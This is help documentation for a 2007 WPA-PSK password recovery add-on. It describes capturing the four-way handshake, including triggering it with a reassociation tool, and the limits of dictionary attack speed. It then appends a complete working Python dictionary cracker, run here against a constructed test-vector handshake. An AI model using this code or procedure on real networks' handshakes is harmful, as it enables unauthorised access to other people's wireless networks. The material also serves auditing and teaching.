WPA Key Recovery Help Documentation
Copyright © 2007 TamoSoft
WPA Key Recovery (WPAKR) is an add-on for CommView for WiFi designed to recover WPA passwords for WPA- or WPA2-protected 802.11 a/b/g wireless networks in Pre-Shared Key (PSK) mode. Because WPA/WPA2 encryption contains no known weakness, the recovery process is based on trying all passwords loaded from the dictionary file one by one, as well as optional password permutations.
To install WPAKR, simply launch the setup file. WPAKR requires CommView for WiFi 5.6 or later and will be installed to the CommView for WiFi application folder. You can also install WPAKR on a computer without CommView for WiFi if you would like to use WPAKR in offline mode, for processing capture files copied from the computer running CommView for WiFi. If you install WPAKR on a computer without CommView for WiFi, you can launch it by double-clicking the program's executable file located in the folder to which you installed it.
If you'd like to use a distributed recovery process, i.e. use multiple computers simultaneously, you will find the installation instructions in the Splitting the Job Between Multiple Computers chapter.
Once WPAKR has been installed, you can launch it by clicking Tools => WPA Key Recovery in the CommView for WiFi menu, as shown below:
Note that this menu item becomes available only after you've installed WPAKR. When WPAKR is launched, CommView for WiFi establishes a TCP/IP connection with WPAKR so that CommView for WiFi can send captured packets to WPAKR for analysis.
To be able to recover a WPA-PSK key, WPAKR needs to receive packets with an Association or Re-association Request followed by the EAPOL key exchange packets. These are the packets used in WPA for negotiating session keys (the four-way handshake). It is important that all of the EAPOL key exchange packets and at least one Association or Re-association Request packet be successfully captured. A damaged or missing EAPOL packet will make it impossible for WPAKR to start a key recovery process, and capturing the next EAPOL conversation between the AP and station may be required. This is an important difference between the way WEP and WPA traffic is decrypted: WEP traffic can be decrypted with the key alone, whereas WPA session keys are derived from the handshake, so the handshake itself must be captured.
As a result, WPAKR displays a new key recovery session only after CommView for WiFi has successfully captured an Association/Re-association Request packet followed by an EAPOL key exchange. This means that you should start capturing traffic from the WLAN in CommView for WiFi and wait for the next EAPOL exchange. EAPOL exchanges take place during station association, which may be triggered by the client connecting or reconnecting to the WLAN, by restarting the AP, or by using the Node Reassociation tool in CommView for WiFi.
Alternatively, you can use WPAKR as a stand-alone application and import Association/Re-association Request and EAPOL packets previously captured by CommView for WiFi:
Once the necessary packets have been captured or loaded from a capture file, a new key recovery session will show up in WPAKR:
The SSID column lists the SSID of the access point. The BSSID column lists the hardware address of the access point. The Password column displays the recovered WPA password, if any. The Status column displays the current application status. Once the password has been recovered, a dialog box will display the password:
The obtained WPA key can be seen by clicking Tools => WPA Passwords in the application menu. WPAKR memorizes recovered keys between launches and tries them first, before attempting to recover them again.
Note that the evaluation version displays only the first two characters of the recovered password. The rest of the characters are replaced by asterisks. The licensed version displays all characters.
The Action menu can be used for manually controlling the key recovery process.
Recovery Speed, Dictionaries, and Password Permutations
Because WPA uses robust encryption without known weakness, the only way to recover a password is by trying words from a dictionary file one by one. This process is very slow because each candidate password must be hashed many times: the WPA pre-shared key is derived from the passphrase and the SSID with PBKDF2, i.e. 4096 rounds of HMAC-SHA1, and only then can the candidate be checked against the captured handshake. A Pentium 4 2.8 GHz computer can try approximately 160 passwords per second. Because of such a low speed, a brute-force attack (i.e. trying all possible character combinations) doesn't make sense, as the minimum allowed WPA password length is eight characters. Trying all combinations even for a 5-character password drawn from a 90-character alphabet would require 90^5, roughly 5.9 billion attempts, which at 160 attempts per second takes more than a year (about 430 days); for the minimum 8-character length, 90^8 is roughly 4.3 × 10^15 attempts, i.e. hundreds of thousands of years at that speed.
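The following is an added worked example, written for this page and not part of WPAKR or CommView for WiFi, showing what the capture requirements above and the slow recovery loop amount to in code: the pre-shared key is derived from a candidate passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 rounds), expanded into the pairwise transient key using the two MAC addresses and the two handshake nonces, and the resulting KCK is used to recompute the Key MIC of an EAPOL-Key message; a match means the candidate is the network's passphrase. The handshake below is constructed, not captured: the MAC addresses and nonces are arbitrary assumed values, and the SSID "IEEE" with passphrase "password" is the PBKDF2 test vector published in IEEE 802.11i. Only the Python standard library is used.

```python
import hashlib
import hmac

# WPA/WPA2-PSK constants from IEEE 802.11i. The PMK is PBKDF2-HMAC-SHA1 over the
# passphrase, salted with the SSID, 4096 rounds, 256-bit output. Those 4096 rounds
# are what limit a dictionary attack to a few hundred candidates per second on a
# 2007-era CPU, and the SSID salt is why a precomputed table only helps for one SSID.
PBKDF2_ROUNDS = 4096
PMK_LEN = 32
MIC_OFFSET = 81   # offset of the 16-byte Key MIC field inside an EAPOL-Key frame
MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32). This is the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ROUNDS, PMK_LEN)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MAC addresses and both nonces (each pair sorted, as the standard requires)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool = True) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    WPA2/RSN (descriptor version 2) uses HMAC-SHA1-128, WPA/TKIP (version 1) uses HMAC-MD5."""
    frame = bytearray(eapol_frame)
    frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN] = b"\x00" * MIC_LEN
    if wpa2:
        return hmac.new(kck, bytes(frame), hashlib.sha1).digest()[:MIC_LEN]
    return hmac.new(kck, bytes(frame), hashlib.md5).digest()


def recover_passphrase(candidates, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wpa2=True):
    """The dictionary loop: one PBKDF2 derivation per candidate, then a cheap MIC comparison."""
    captured_mic = bytes(eapol_frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN])
    for cand in candidates:
        if not 8 <= len(cand) <= 63:   # WPA passphrases are 8 to 63 characters; skip impossible entries
            continue
        kck = derive_ptk(derive_pmk(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]   # KCK = PTK[0:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, wpa2), captured_mic):
            return cand
    return None


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN, key_data: bytes = b"") -> bytes:
    """EAPOL-Key message 2 of 4 (RSN descriptor): carries the station's SNonce and the first MIC of the handshake."""
    body = bytes([2])                                   # descriptor type 2 = RSN (WPA2)
    body += (0x010A).to_bytes(2, "big")                 # key info: version 2 (HMAC-SHA1-128), pairwise, MIC present
    body += (16).to_bytes(2, "big")                     # key length (CCMP)
    body += (1).to_bytes(8, "big")                      # replay counter
    body += snonce                                      # 32-byte SNonce
    body += b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # key IV, key RSC, key ID (all zero in message 2)
    body += mic                                         # 16-byte Key MIC (zeroed while the MIC is computed)
    body += len(key_data).to_bytes(2, "big") + key_data # a real message 2 carries the station's RSN IE here
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # 802.1X header: version 1, type 3 = EAPOL-Key


def constructed_handshake():
    """Constructed sample capture, not real traffic. MACs and nonces are assumed values;
    SSID "IEEE" / passphrase "password" is the PBKDF2 test vector from IEEE 802.11i."""
    ssid, passphrase = "IEEE", "password"
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    frame = build_eapol_msg2(snonce)                     # MIC field still zero
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame = build_eapol_msg2(snonce, mic=eapol_mic(kck, frame))
    return ssid, ap_mac, sta_mac, anonce, snonce, frame


def demo(candidates=("letmein1", "Password", "password1", "password", "qwerty123")):
    """Run the dictionary loop over a small constructed word list against the constructed handshake."""
    ssid, ap_mac, sta_mac, anonce, snonce, frame = constructed_handshake()
    return recover_passphrase(candidates, ssid, ap_mac, sta_mac, anonce, snonce, frame)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The check itself is cheap; nearly all of the time per candidate is spent inside derive_pmk, which is why WPAKR's throughput is bounded by PBKDF2 and why trying a word list beats exhaustive search. Note that "Password" and "password1" are rejected even though they differ from the real passphrase by one character: PBKDF2 gives no partial-match signal, so permutations must each be tried in full.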